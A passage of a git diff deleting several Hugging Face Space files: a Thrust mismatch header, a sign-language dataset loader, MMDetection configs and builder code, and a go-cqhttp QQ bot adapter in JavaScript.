- */ - - -#pragma once - -#include -#include - -namespace thrust -{ -namespace system -{ -namespace detail -{ -namespace generic -{ - - -template -__host__ __device__ - thrust::pair - mismatch(thrust::execution_policy &exec, - InputIterator1 first1, - InputIterator1 last1, - InputIterator2 first2); - - -template -__host__ __device__ - thrust::pair - mismatch(thrust::execution_policy &exec, - InputIterator1 first1, - InputIterator1 last1, - InputIterator2 first2, - BinaryPredicate pred); - - -} // end namespace generic -} // end namespace detail -} // end namespace system -} // end namespace thrust - -#include - diff --git a/spaces/CVPR/SPOTER_Sign_Language_Recognition/spoter_mod/datasets/czech_slr_dataset.py b/spaces/CVPR/SPOTER_Sign_Language_Recognition/spoter_mod/datasets/czech_slr_dataset.py deleted file mode 100644 index 5ce737b8c3a5e9f6865a002d44393d6fc1dfae8a..0000000000000000000000000000000000000000 --- a/spaces/CVPR/SPOTER_Sign_Language_Recognition/spoter_mod/datasets/czech_slr_dataset.py +++ /dev/null @@ -1,153 +0,0 @@ -import ast -import torch - -import pandas as pd -import torch.utils.data as torch_data - -from random import randrange -from augmentations import * -from normalization.body_normalization import BODY_IDENTIFIERS -from normalization.hand_normalization import HAND_IDENTIFIERS -from normalization.body_normalization import normalize_single_dict as normalize_single_body_dict -from normalization.hand_normalization import normalize_single_dict as normalize_single_hand_dict - -HAND_IDENTIFIERS = [id + "_0" for id in HAND_IDENTIFIERS] + [id + "_1" for id in HAND_IDENTIFIERS] - -DEFAULT_AUGMENTATIONS_CONFIG = { - "rotate-angle": 13, - "perspective-transform-ratio": 0.1, - "squeeze-ratio": 0.15, - "arm-joint-rotate-angle": 4, - "arm-joint-rotate-probability": 0.3 -} - - -def load_dataset(file_location: str): - - # Load the datset csv file - df = pd.read_csv(file_location, encoding="utf-8") - - # TO BE DELETED - df.columns = [item.replace("_Left_", "_0_").replace("_Right_", "_1_") for item in list(df.columns)] - if "neck_X" not in df.columns: - df["neck_X"] = [0 for _ in range(df.shape[0])] - df["neck_Y"] = [0 for _ in range(df.shape[0])] - - # TEMP - labels = df["labels"].to_list() - labels = [label + 1 for label in df["labels"].to_list()] - data = [] - - for row_index, row in df.iterrows(): - current_row = np.empty(shape=(len(ast.literal_eval(row["leftEar_X"])), len(BODY_IDENTIFIERS + HAND_IDENTIFIERS), 2)) - for index, identifier in enumerate(BODY_IDENTIFIERS + HAND_IDENTIFIERS): - current_row[:, index, 0] = ast.literal_eval(row[identifier + "_X"]) - current_row[:, index, 1] = ast.literal_eval(row[identifier + "_Y"]) - - data.append(current_row) - - return data, labels - - -def tensor_to_dictionary(landmarks_tensor: torch.Tensor) -> dict: - - data_array = landmarks_tensor.numpy() - output = {} - - for landmark_index, identifier in enumerate(BODY_IDENTIFIERS + HAND_IDENTIFIERS): - output[identifier] = data_array[:, landmark_index] - - return output - - -def dictionary_to_tensor(landmarks_dict: dict) -> torch.Tensor: - - output = np.empty(shape=(len(landmarks_dict["leftEar"]), len(BODY_IDENTIFIERS + HAND_IDENTIFIERS), 2)) - - for landmark_index, identifier in enumerate(BODY_IDENTIFIERS + HAND_IDENTIFIERS): - output[:, landmark_index, 0] = [frame[0] for frame in landmarks_dict[identifier]] - output[:, landmark_index, 1] = [frame[1] for frame in landmarks_dict[identifier]] - - return torch.from_numpy(output) - - -class CzechSLRDataset(torch_data.Dataset): - """Advanced object 
representation of the HPOES dataset for loading hand joints landmarks utilizing the Torch's - built-in Dataset properties""" - - data: [np.ndarray] - labels: [np.ndarray] - - def __init__(self, dataset_filename: str, num_labels=5, transform=None, augmentations=False, - augmentations_prob=0.5, normalize=True, augmentations_config: dict = DEFAULT_AUGMENTATIONS_CONFIG): - """ - Initiates the HPOESDataset with the pre-loaded data from the h5 file. - - :param dataset_filename: Path to the h5 file - :param transform: Any data transformation to be applied (default: None) - """ - - loaded_data = load_dataset(dataset_filename) - data, labels = loaded_data[0], loaded_data[1] - - self.data = data - self.labels = labels - self.targets = list(labels) - self.num_labels = num_labels - self.transform = transform - - self.augmentations = augmentations - self.augmentations_prob = augmentations_prob - self.augmentations_config = augmentations_config - self.normalize = normalize - - def __getitem__(self, idx): - """ - Allocates, potentially transforms and returns the item at the desired index. - - :param idx: Index of the item - :return: Tuple containing both the depth map and the label - """ - - depth_map = torch.from_numpy(np.copy(self.data[idx])) - label = torch.Tensor([self.labels[idx] - 1]) - - depth_map = tensor_to_dictionary(depth_map) - - # Apply potential augmentations - if self.augmentations and random.random() < self.augmentations_prob: - - selected_aug = randrange(4) - - if selected_aug == 0: - depth_map = augment_rotate(depth_map, (-self.augmentations_config["rotate-angle"], self.augmentations_config["rotate-angle"])) - - if selected_aug == 1: - depth_map = augment_shear(depth_map, "perspective", (0, self.augmentations_config["perspective-transform-ratio"])) - - if selected_aug == 2: - depth_map = augment_shear(depth_map, "squeeze", (0, self.augmentations_config["squeeze-ratio"])) - - if selected_aug == 3: - depth_map = augment_arm_joint_rotate(depth_map, self.augmentations_config["arm-joint-rotate-probability"], (-self.augmentations_config["arm-joint-rotate-angle"], self.augmentations_config["arm-joint-rotate-angle"])) - - if self.normalize: - depth_map = normalize_single_body_dict(depth_map) - depth_map = normalize_single_hand_dict(depth_map) - - depth_map = dictionary_to_tensor(depth_map) - - # Move the landmark position interval to improve performance - depth_map = depth_map - 0.5 - - if self.transform: - depth_map = self.transform(depth_map) - - return depth_map, label - - def __len__(self): - return len(self.labels) - - -if __name__ == "__main__": - pass diff --git a/spaces/CVPR/WALT/configs/walt/walt_people.py b/spaces/CVPR/WALT/configs/walt/walt_people.py deleted file mode 100644 index 2dc45cd270a2cdb64f33a3a47b32eadd15a98c57..0000000000000000000000000000000000000000 --- a/spaces/CVPR/WALT/configs/walt/walt_people.py +++ /dev/null @@ -1,80 +0,0 @@ -_base_ = [ - '../_base_/models/occ_mask_rcnn_swin_fpn.py', - '../_base_/datasets/walt_people.py', - '../_base_/schedules/schedule_1x.py', '../_base_/default_runtime.py' -] - -model = dict( - backbone=dict( - embed_dim=96, - depths=[2, 2, 6, 2], - num_heads=[3, 6, 12, 24], - window_size=7, - ape=False, - drop_path_rate=0.1, - patch_norm=True, - use_checkpoint=False - ), - neck=dict(in_channels=[96, 192, 384, 768])) - -img_norm_cfg = dict( - mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True) - -# augmentation strategy originates from DETR / Sparse RCNN -train_pipeline = [ - dict(type='LoadImageFromFile'), - 
dict(type='LoadAnnotations', with_bbox=True, with_mask=True), - dict(type='RandomFlip', flip_ratio=0.5), - dict(type='AutoAugment', - policies=[ - [ - dict(type='Resize', - img_scale=[(480, 1333), (512, 1333), (544, 1333), (576, 1333), - (608, 1333), (640, 1333), (672, 1333), (704, 1333), - (736, 1333), (768, 1333), (800, 1333)], - multiscale_mode='value', - keep_ratio=True) - ], - [ - dict(type='Resize', - img_scale=[(400, 1333), (500, 1333), (600, 1333)], - multiscale_mode='value', - keep_ratio=True), - dict(type='RandomCrop', - crop_type='absolute_range', - crop_size=(384, 600), - allow_negative_crop=True), - dict(type='Resize', - img_scale=[(480, 1333), (512, 1333), (544, 1333), - (576, 1333), (608, 1333), (640, 1333), - (672, 1333), (704, 1333), (736, 1333), - (768, 1333), (800, 1333)], - multiscale_mode='value', - override=True, - keep_ratio=True) - ] - ]), - dict(type='Normalize', **img_norm_cfg), - dict(type='Pad', size_divisor=32), - dict(type='DefaultFormatBundle'), - dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels', 'gt_masks']), -] -data = dict(train=dict(pipeline=train_pipeline)) - -optimizer = dict(_delete_=True, type='AdamW', lr=0.0001, betas=(0.9, 0.999), weight_decay=0.05, - paramwise_cfg=dict(custom_keys={'absolute_pos_embed': dict(decay_mult=0.), - 'relative_position_bias_table': dict(decay_mult=0.), - 'norm': dict(decay_mult=0.)})) -lr_config = dict(step=[8, 11]) -runner = dict(type='EpochBasedRunnerAmp', max_epochs=12) - -# do not use mmdet version fp16 -fp16 = None -optimizer_config = dict( - type="DistOptimizerHook", - update_interval=1, - grad_clip=None, - coalesce=True, - bucket_size_mb=-1, - use_fp16=True, -) diff --git a/spaces/CVPR/WALT/mmdet/datasets/builder.py b/spaces/CVPR/WALT/mmdet/datasets/builder.py deleted file mode 100644 index c9466a517dee746a6677b27a19713f2e89ed7194..0000000000000000000000000000000000000000 --- a/spaces/CVPR/WALT/mmdet/datasets/builder.py +++ /dev/null @@ -1,143 +0,0 @@ -import copy -import platform -import random -from functools import partial - -import numpy as np -from mmcv.parallel import collate -from mmcv.runner import get_dist_info -from mmcv.utils import Registry, build_from_cfg -from torch.utils.data import DataLoader - -from .samplers import DistributedGroupSampler, DistributedSampler, GroupSampler - -if platform.system() != 'Windows': - # https://github.com/pytorch/pytorch/issues/973 - import resource - rlimit = resource.getrlimit(resource.RLIMIT_NOFILE) - hard_limit = rlimit[1] - soft_limit = min(4096, hard_limit) - resource.setrlimit(resource.RLIMIT_NOFILE, (soft_limit, hard_limit)) - -DATASETS = Registry('dataset') -PIPELINES = Registry('pipeline') - - -def _concat_dataset(cfg, default_args=None): - from .dataset_wrappers import ConcatDataset - ann_files = cfg['ann_file'] - img_prefixes = cfg.get('img_prefix', None) - seg_prefixes = cfg.get('seg_prefix', None) - proposal_files = cfg.get('proposal_file', None) - separate_eval = cfg.get('separate_eval', True) - - datasets = [] - num_dset = len(ann_files) - for i in range(num_dset): - data_cfg = copy.deepcopy(cfg) - # pop 'separate_eval' since it is not a valid key for common datasets. 
- if 'separate_eval' in data_cfg: - data_cfg.pop('separate_eval') - data_cfg['ann_file'] = ann_files[i] - if isinstance(img_prefixes, (list, tuple)): - data_cfg['img_prefix'] = img_prefixes[i] - if isinstance(seg_prefixes, (list, tuple)): - data_cfg['seg_prefix'] = seg_prefixes[i] - if isinstance(proposal_files, (list, tuple)): - data_cfg['proposal_file'] = proposal_files[i] - datasets.append(build_dataset(data_cfg, default_args)) - - return ConcatDataset(datasets, separate_eval) - - -def build_dataset(cfg, default_args=None): - from .dataset_wrappers import (ConcatDataset, RepeatDataset, - ClassBalancedDataset) - if isinstance(cfg, (list, tuple)): - dataset = ConcatDataset([build_dataset(c, default_args) for c in cfg]) - elif cfg['type'] == 'ConcatDataset': - dataset = ConcatDataset( - [build_dataset(c, default_args) for c in cfg['datasets']], - cfg.get('separate_eval', True)) - elif cfg['type'] == 'RepeatDataset': - dataset = RepeatDataset( - build_dataset(cfg['dataset'], default_args), cfg['times']) - elif cfg['type'] == 'ClassBalancedDataset': - dataset = ClassBalancedDataset( - build_dataset(cfg['dataset'], default_args), cfg['oversample_thr']) - elif isinstance(cfg.get('ann_file'), (list, tuple)): - dataset = _concat_dataset(cfg, default_args) - else: - dataset = build_from_cfg(cfg, DATASETS, default_args) - - return dataset - - -def build_dataloader(dataset, - samples_per_gpu, - workers_per_gpu, - num_gpus=1, - dist=True, - shuffle=True, - seed=None, - **kwargs): - """Build PyTorch DataLoader. - - In distributed training, each GPU/process has a dataloader. - In non-distributed training, there is only one dataloader for all GPUs. - - Args: - dataset (Dataset): A PyTorch dataset. - samples_per_gpu (int): Number of training samples on each GPU, i.e., - batch size of each GPU. - workers_per_gpu (int): How many subprocesses to use for data loading - for each GPU. - num_gpus (int): Number of GPUs. Only used in non-distributed training. - dist (bool): Distributed training/test or not. Default: True. - shuffle (bool): Whether to shuffle the data at every epoch. - Default: True. - kwargs: any keyword argument to be used to initialize DataLoader - - Returns: - DataLoader: A PyTorch dataloader. 
- """ - rank, world_size = get_dist_info() - if dist: - # DistributedGroupSampler will definitely shuffle the data to satisfy - # that images on each GPU are in the same group - if shuffle: - sampler = DistributedGroupSampler( - dataset, samples_per_gpu, world_size, rank, seed=seed) - else: - sampler = DistributedSampler( - dataset, world_size, rank, shuffle=False, seed=seed) - batch_size = samples_per_gpu - num_workers = workers_per_gpu - else: - sampler = GroupSampler(dataset, samples_per_gpu) if shuffle else None - batch_size = num_gpus * samples_per_gpu - num_workers = num_gpus * workers_per_gpu - - init_fn = partial( - worker_init_fn, num_workers=num_workers, rank=rank, - seed=seed) if seed is not None else None - - data_loader = DataLoader( - dataset, - batch_size=batch_size, - sampler=sampler, - num_workers=num_workers, - collate_fn=partial(collate, samples_per_gpu=samples_per_gpu), - pin_memory=False, - worker_init_fn=init_fn, - **kwargs) - - return data_loader - - -def worker_init_fn(worker_id, num_workers, rank, seed): - # The seed of each worker equals to - # num_worker * rank + worker_id + user_seed - worker_seed = num_workers * rank + worker_id + seed - np.random.seed(worker_seed) - random.seed(worker_seed) diff --git a/spaces/Chujinze/Res2Net/README.md b/spaces/Chujinze/Res2Net/README.md deleted file mode 100644 index 08136cd740a9589de8235927d5293a3e09c5bbeb..0000000000000000000000000000000000000000 --- a/spaces/Chujinze/Res2Net/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: Res2Net -emoji: 👁 -colorFrom: green -colorTo: gray -sdk: gradio -sdk_version: 3.0.1 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces#reference diff --git a/spaces/CikeyQI/Yunzai/Yunzai/plugins/adapter/go-cqhttp.js b/spaces/CikeyQI/Yunzai/Yunzai/plugins/adapter/go-cqhttp.js deleted file mode 100644 index 78cc78330088d80b49d4afa30c940f4086029480..0000000000000000000000000000000000000000 --- a/spaces/CikeyQI/Yunzai/Yunzai/plugins/adapter/go-cqhttp.js +++ /dev/null @@ -1,842 +0,0 @@ -import { randomUUID } from "crypto" -import path from "node:path" -import fs from "node:fs" - -Bot.adapter.push(new class gocqhttpAdapter { - constructor() { - this.id = "QQ" - this.name = "go-cqhttp" - this.path = this.name - } - - toStr(data) { - switch (typeof data) { - case "string": - return data - case "number": - return String(data) - case "object": - if (Buffer.isBuffer(data)) - return Buffer.from(data, "utf8").toString() - else - return JSON.stringify(data) - } - return data - } - - makeLog(msg) { - return this.toStr(msg).replace(/base64:\/\/.*?(,|]|")/g, "base64://...$1") - } - - sendApi(ws, action, params) { - const echo = randomUUID() - const msg = { action, params, echo } - ws.sendMsg(msg) - return new Promise(resolve => - Bot.once(echo, data => - resolve({ ...data, ...data.data }))) - } - - setProfile(data, profile) { - logger.info(`${logger.blue(`[${data.self_id}]`)} 设置资料:${JSON.stringify(profile)}`) - return data.bot.sendApi("set_qq_profile", profile) - } - - makeMsg(msg) { - if (!Array.isArray(msg)) - msg = [msg] - const msgs = [] - for (const i of msg) - if (typeof i == "object") { - if (i.data) - msgs.push(i) - else - msgs.push({ type: i.type, data: { ...i, type: undefined }}) - } else { - msgs.push({ type: "text", data: { text: i }}) - } - return msgs - } - - sendFriendMsg(data, msg) { - if (msg?.type == "node") - return this.sendFriendForwardMsg(data, msg.data) - - logger.info(`${logger.blue(`[${data.self_id} => ${data.user_id}]`)} 
发送好友消息:${this.makeLog(msg)}`) - return data.bot.sendApi("send_msg", { - user_id: data.user_id, - message: this.makeMsg(msg), - }) - } - - sendGroupMsg(data, msg) { - if (msg?.type == "node") - return this.sendGroupForwardMsg(data, msg.data) - - logger.info(`${logger.blue(`[${data.self_id} => ${data.group_id}]`)} 发送群消息:${this.makeLog(msg)}`) - return data.bot.sendApi("send_msg", { - group_id: data.group_id, - message: this.makeMsg(msg), - }) - } - - sendGuildMsg(data, msg) { - if (msg?.type == "node") - return Bot.sendForwardMsg(msg => this.sendGuildMsg(data, msg), msg) - - logger.info(`${logger.blue(`[${data.self_id}] => ${data.guild_id}-${data.channel_id}`)} 发送频道消息:${this.makeLog(msg)}`) - return data.bot.sendApi("send_guild_channel_msg", { - guild_id: data.guild_id, - channel_id: data.channel_id, - message: this.makeMsg(msg), - }) - } - - async getMsg(data, message_id) { - const msg = (await data.bot.sendApi("get_msg", { message_id })).data - - if (msg?.message) { - const message = [] - for (const i of msg.message) - message.push({ ...i.data, type: i.type }) - msg.message = message - } - - return msg - } - - recallMsg(data, message_id) { - logger.info(`${logger.blue(`[${data.self_id}]`)} 撤回消息:${message_id}`) - return data.bot.sendApi("delete_msg", { message_id }) - } - - getForwardMsg(data, message_id) { - return data.bot.sendApi("get_forward_msg", { message_id }) - } - - makeForwardMsg(msg) { - const messages = [] - for (const i of msg) - messages.push({ - type: "node", - data: { - name: i.nickname || "匿名消息", - uin: Number(i.user_id) || 80000000, - content: this.makeMsg(i.message), - time: i.time, - }, - }) - return messages - } - - async sendFriendForwardMsg(data, msg) { - logger.info(`${logger.blue(`[${data.self_id} => ${data.user_id}]`)} 发送好友转发消息:${this.makeLog(msg)}`) - msg = await data.bot.sendApi("send_private_forward_msg", { - user_id: data.user_id, - messages: this.makeForwardMsg(msg), - }) - return msg - } - - async sendGroupForwardMsg(data, msg) { - logger.info(`${logger.blue(`[${data.self_id} => ${data.group_id}]`)} 发送群转发消息:${this.makeLog(msg)}`) - msg = await data.bot.sendApi("send_group_forward_msg", { - group_id: data.group_id, - messages: this.makeForwardMsg(msg), - }) - return msg - } - - async getFriendArray(data) { - return (await data.bot.sendApi("get_friend_list")).data - } - - async getFriendList(data) { - const array = [] - for (const { user_id } of (await this.getFriendArray(data))) - array.push(user_id) - return array - } - - async getFriendMap(data) { - for (const i of (await this.getFriendArray(data))) - data.bot.fl.set(i.user_id, i) - return data.bot.fl - } - - getFriendInfo(data) { - return data.bot.sendApi("get_stranger_info", { - user_id: data.user_id, - }) - } - - async getGroupArray(data) { - const array = (await data.bot.sendApi("get_group_list")).data - for (const guild of (await this.getGuildArray(data))) - for (const channel of (await this.getGuildChannelArray({ - ...data, - guild_id: guild.guild_id, - }))) - array.push({ - guild, - channel, - group_id: `${guild.guild_id}-${channel.channel_id}`, - group_name: `${guild.guild_name}-${channel.channel_name}`, - }) - return array - } - - async getGroupList(data) { - const array = [] - for (const { group_id } of (await this.getGroupArray(data))) - array.push(group_id) - return array - } - - async getGroupMap(data) { - for (const i of (await this.getGroupArray(data))) - data.bot.gl.set(i.group_id, i) - return data.bot.gl - } - - getGroupInfo(data) { - return data.bot.sendApi("get_group_info", { - group_id: 
data.group_id, - }) - } - - async getMemberArray(data) { - return (await data.bot.sendApi("get_group_member_list", { - group_id: data.group_id, - })).data - } - - async getMemberList(data) { - const array = [] - for (const { user_id } of (await this.getMemberArray(data))) - array.push(user_id) - return array - } - - async getMemberMap(data) { - const map = new Map - for (const i of (await this.getMemberArray(data))) - map.set(i.user_id, i) - return map - } - - getMemberInfo(data) { - return data.bot.sendApi("get_group_member_info", { - group_id: data.group_id, - user_id: data.user_id, - }) - } - - async getGuildArray(data) { - return (await data.bot.sendApi("get_guild_list")).data - } - - getGuildInfo(data) { - return data.bot.sendApi("get_guild_meta_by_guest", { - guild_id: data.guild_id, - }) - } - - async getGuildChannelArray(data) { - return (await data.bot.sendApi("get_guild_channel_list", { - guild_id: data.guild_id, - })).data - } - - async getGuildChannelMap(data) { - const map = new Map - for (const i of (await this.getGuildChannelArray(data))) - map.set(i.channel_id, i) - return map - } - - async getGuildMemberArray(data) { - const array = [] - let next_token = "" - while (true) { - const list = (await data.bot.sendApi("get_guild_member_list", { - guild_id: data.guild_id, - next_token, - })).data - - for (const i of list.members) - array.push({ - ...i, - user_id: i.tiny_id, - }) - if (list.finished) break - next_token = list.next_token - } - return array - } - - async getGuildMemberList(data) { - const array = [] - for (const { user_id } of (await this.getGuildMemberArray(data))) - array.push(user_id) - return array.push - } - - async getGuildMemberMap(data) { - const map = new Map - for (const i of (await this.getGuildMemberArray(data))) - map.set(i.user_id, i) - return map - } - - getGuildMemberInfo(data) { - return data.bot.sendApi("get_guild_member_profile", { - guild_id: data.guild_id, - user_id: data.user_id, - }) - } - - setGroupName(data, group_name) { - logger.info(`${logger.blue(`[${data.self_id}]`)} 设置群名:[${data.group_id}] ${group_name}`) - return data.bot.sendApi("set_group_name", { - group_id: data.group_id, - group_name, - }) - } - - setGroupAvatar(data, file) { - logger.info(`${logger.blue(`[${data.self_id}]`)} 设置群头像:[${data.group_id}] ${file}`) - return data.bot.sendApi("set_group_portrait", { - group_id: data.group_id, - file: segment.image(file).file, - }) - } - - setGroupAdmin(data, user_id, enable) { - logger.info(`${logger.blue(`[${data.self_id}]`)} ${enable ? 
"设置" : "取消"}群管理员:[${data.group_id}] ${user_id}`) - return data.bot.sendApi("set_group_admin", { - group_id: data.group_id, - user_id, - enable, - }) - } - - setGroupCard(data, user_id, card) { - logger.info(`${logger.blue(`[${data.self_id}]`)} 设置群名片:[${data.group_id}] ${user_id} ${card}`) - return data.bot.sendApi("set_group_card", { - group_id: data.group_id, - user_id, - card, - }) - } - - setGroupTitle(data, user_id, special_title, duration) { - logger.info(`${logger.blue(`[${data.self_id}]`)} 设置群头衔:[${data.group_id}] ${user_id} ${special_title} ${duration}`) - return data.bot.sendApi("set_group_special_title", { - group_id: data.group_id, - user_id, - special_title, - duration, - }) - } - - downloadFile(data, url, thread_count, headers) { - return data.bot.sendApi("download_file", { - url, - thread_count, - headers, - }) - } - - async makeFile(data, file, name = path.basename(file)) { - if (file.match(/^https?:\/\//)) - file = (await this.downloadFile(data, file)).file - else if (fs.existsSync(file)) - file = path.resolve(file) - return { file, name } - } - - async sendFriendFile(data, file, name) { - logger.info(`${logger.blue(`[${data.self_id} => ${data.user_id}]`)} 发送好友文件:${name}(${file})`) - return data.bot.sendApi("upload_private_file", { - user_id: data.user_id, - ...await this.makeFile(data, file, name), - }) - } - - async sendGroupFile(data, file, folder, name) { - logger.info(`${logger.blue(`[${data.self_id}]`)} 发送群文件:[${data.group_id}] ${folder||""}/${name}(${file})`) - return data.bot.sendApi("upload_group_file", { - group_id: data.group_id, - folder, - ...await this.makeFile(data, file, name), - }) - } - - deleteGroupFile(data, file_id, busid) { - logger.info(`${logger.blue(`[${data.self_id}]`)} 删除群文件:[${data.group_id}] ${file_id}(${busid})`) - return data.bot.sendApi("delete_group_file", { - group_id: data.group_id, - file_id, - busid, - }) - } - - createGroupFileFolder(data, name) { - logger.info(`${logger.blue(`[${data.self_id}]`)} 创建群文件夹:[${data.group_id}] ${name}`) - return data.bot.sendApi("create_group_file_folder", { - group_id: data.group_id, - name, - }) - } - - getGroupFileSystemInfo(data) { - return data.bot.sendApi("get_group_file_system_info", { - group_id: data.group_id, - }) - } - - getGroupFiles(data, folder_id) { - if (folder_id) - return data.bot.sendApi("get_group_files_by_folder", { - group_id: data.group_id, - folder_id, - }) - return data.bot.sendApi("get_group_root_files", { - group_id: data.group_id, - }) - } - - getGroupFileUrl(data, file_id, busid) { - return data.bot.sendApi("get_group_file_url", { - group_id: data.group_id, - file_id, - busid, - }) - } - - getGroupFs(data) { - return { - upload: (file, folder, name) => this.sendGroupFile(data, file, folder, name), - rm: (file_id, busid) => this.deleteGroupFile(data, file_id, busid), - mkdir: name => this.createGroupFileFolder(data, name), - df: () => this.getGroupFileSystemInfo(data), - ls: folder_id => this.getGroupFiles(data, folder_id), - download: (file_id, busid) => this.getGroupFileUrl(data, file_id, busid), - } - } - - setFriendAddRequest(data, flag, approve, remark) { - return data.bot.sendApi("set_friend_add_request", { - flag, - approve, - remark, - }) - } - - setGroupAddRequest(data, flag, sub_type, approve, reason) { - return data.bot.sendApi("set_group_add_request", { - flag, - sub_type, - approve, - reason, - }) - } - - pickFriend(data, user_id) { - const i = { - ...data.bot.fl.get(user_id), - ...data, - user_id, - } - return { - ...i, - sendMsg: msg => this.sendFriendMsg(i, msg), 
- getMsg: message_id => this.getMsg(i, message_id), - recallMsg: message_id => this.recallMsg(i, message_id), - getForwardMsg: message_id => this.getForwardMsg(i, message_id), - sendForwardMsg: msg => this.sendFriendForwardMsg(i, msg), - sendFile: (file, name) => this.sendFriendFile(i, file, name), - getInfo: () => this.getFriendInfo(i), - getAvatarUrl: () => `https://q1.qlogo.cn/g?b=qq&s=0&nk=${user_id}`, - } - } - - pickMember(data, group_id, user_id) { - if (typeof group_id == "string" && group_id.match("-")) { - const guild_id = group_id.split("-") - const i = { - ...data, - guild_id: guild_id[0], - channel_id: guild_id[1], - user_id, - } - return { - ...this.pickGroup(i, group_id), - ...i, - getInfo: () => this.getGuildMemberInfo(i), - getAvatarUrl: async () => (await this.getGuildMemberInfo(i)).avatar_url, - } - } - - const i = { - ...data.bot.fl.get(user_id), - ...data, - group_id, - user_id, - } - return { - ...this.pickFriend(i, user_id), - ...i, - getInfo: () => this.getMemberInfo(i), - poke: () => this.sendGroupMsg(i, segment.poke(user_id)), - } - } - - pickGroup(data, group_id) { - if (typeof group_id == "string" && group_id.match("-")) { - const guild_id = group_id.split("-") - const i = { - ...data.bot.gl.get(group_id), - ...data, - guild_id: guild_id[0], - channel_id: guild_id[1], - } - return { - ...i, - sendMsg: msg => this.sendGuildMsg(i, msg), - getMsg: message_id => this.getMsg(i, message_id), - recallMsg: message_id => this.recallMsg(i, message_id), - getForwardMsg: message_id => this.getForwardMsg(i, message_id), - getInfo: () => this.getGuildInfo(i), - getChannelArray: () => this.getGuildChannelArray(i), - getChannelList: () => this.getGuildChannelList(i), - getChannelMap: () => this.getGuildChannelMap(i), - getMemberArray: () => this.getGuildMemberArray(i), - getMemberList: () => this.getGuildMemberList(i), - getMemberMap: () => this.getGuildMemberMap(i), - pickMember: user_id => this.pickMember(i, group_id, user_id), - } - } - - const i = { - ...data.bot.gl.get(group_id), - ...data, - group_id, - } - return { - ...i, - sendMsg: msg => this.sendGroupMsg(i, msg), - getMsg: message_id => this.getMsg(i, message_id), - recallMsg: message_id => this.recallMsg(i, message_id), - getForwardMsg: message_id => this.getForwardMsg(i, message_id), - sendForwardMsg: msg => this.sendGroupForwardMsg(i, msg), - sendFile: (file, name) => this.sendGroupFile(i, file, undefined, name), - getInfo: () => this.getGroupInfo(i), - getAvatarUrl: () => `https://p.qlogo.cn/gh/${group_id}/${group_id}/0`, - getMemberArray: () => this.getMemberArray(i), - getMemberList: () => this.getMemberList(i), - getMemberMap: () => this.getMemberMap(i), - pickMember: user_id => this.pickMember(i, group_id, user_id), - pokeMember: user_id => this.sendGroupMsg(i, segment.poke(user_id)), - setName: group_name => this.setGroupName(i, group_name), - setAvatar: file => this.setGroupAvatar(i, file), - setAdmin: (user_id, enable) => this.setGroupAdmin(i, user_id, enable), - setCard: (user_id, card) => this.setGroupCard(i, user_id, card), - setTitle: (user_id, special_title, duration) => this.setGroupTitle(i, user_id, special_title, duration), - fs: this.getGroupFs(i), - } - } - - async connect(data, ws) { - Bot[data.self_id] = { - adapter: this, - ws: ws, - sendApi: (action, params) => this.sendApi(ws, action, params), - stat: { start_time: data.time }, - model: "TRSS Yunzai ", - - info: {}, - get uin() { return this.info.user_id }, - get nickname() { return this.info.nickname }, - get avatar() { return 
`https://q1.qlogo.cn/g?b=qq&s=0&nk=${this.uin}` }, - - setProfile: profile => this.setProfile(data, profile), - setNickname: nickname => this.setProfile(data, { nickname }), - - pickFriend: user_id => this.pickFriend(data, user_id), - get pickUser() { return this.pickFriend }, - getFriendArray: () => this.getFriendArray(data), - getFriendList: () => this.getFriendList(data), - getFriendMap: () => this.getFriendMap(data), - fl: new Map, - - pickMember: (group_id, user_id) => this.pickMember(data, group_id, user_id), - pickGroup: group_id => this.pickGroup(data, group_id), - getGroupArray: () => this.getGroupArray(data), - getGroupList: () => this.getGroupList(data), - getGroupMap: () => this.getGroupMap(data), - gl: new Map, - gml: new Map, - - request_list: [], - getSystemMsg: () => data.bot.request_list, - setFriendAddRequest: (flag, approve, remark) => this.setFriendAddRequest(data, flag, approve, remark), - setGroupAddRequest: (flag, sub_type, approve, reason) => this.setGroupAddRequest(data, flag, sub_type, approve, reason), - } - data.bot = Bot[data.self_id] - - if (!Bot.uin.includes(data.self_id)) - Bot.uin.push(data.self_id) - - data.bot.sendApi("_set_model_show", { - model: data.bot.model, - model_show: data.bot.model, - }) - - data.bot.info = (await data.bot.sendApi("get_login_info")).data - data.bot.guild_info = (await data.bot.sendApi("get_guild_service_profile")).data - data.bot.clients = (await data.bot.sendApi("get_online_clients")).clients - data.bot.version = { - ...(await data.bot.sendApi("get_version_info")).data, - id: this.id, - name: this.name, - } - - data.bot.getFriendMap() - data.bot.getGroupMap() - - logger.mark(`${logger.blue(`[${data.self_id}]`)} ${this.name}(${this.id}) ${data.bot.version.app_full_name} 已连接`) - Bot.em(`connect.${data.self_id}`, data) - } - - makeMessage(data) { - const message = [] - for (const i of data.message) - message.push({ ...i.data, type: i.type }) - data.message = message - - switch (data.message_type) { - case "private": - logger.info(`${logger.blue(`[${data.self_id}]`)} 好友消息:[${data.sender.nickname}(${data.user_id})] ${data.raw_message}`) - break - case "group": - logger.info(`${logger.blue(`[${data.self_id}]`)} 群消息:[${data.group_id}, ${data.sender.card||data.sender.nickname}(${data.user_id})] ${data.raw_message}`) - break - case "guild": - data.message_type = "group" - data.group_id = `${data.guild_id}-${data.channel_id}` - logger.info(`${logger.blue(`[${data.self_id}]`)} 频道消息:[${data.group_id}, ${data.sender.nickname}(${data.user_id})] ${JSON.stringify(data.message)}`) - Object.defineProperty(data, "friend", { get() { return this.member || {}}}) - break - default: - logger.warn(`${logger.blue(`[${data.self_id}]`)} 未知消息:${logger.magenta(JSON.stringify(data))}`) - } - - Bot.em(`${data.post_type}.${data.message_type}.${data.sub_type}`, data) - } - - async makeNotice(data) { - switch (data.notice_type) { - case "friend_recall": - logger.info(`${logger.blue(`[${data.self_id}]`)} 好友消息撤回:[${data.user_id}] ${data.message_id}`) - break - case "group_recall": - logger.info(`${logger.blue(`[${data.self_id}]`)} 群消息撤回:[${data.group_id}, ${data.operator_id}=>${data.user_id}] ${data.message_id}`) - break - case "group_increase": - logger.info(`${logger.blue(`[${data.self_id}]`)} 群成员增加:[${data.group_id}, ${data.operator_id}=>${data.user_id}] ${data.sub_type}`) - if (data.user_id == data.self_id) - data.bot.getGroupMap() - break - case "group_decrease": - 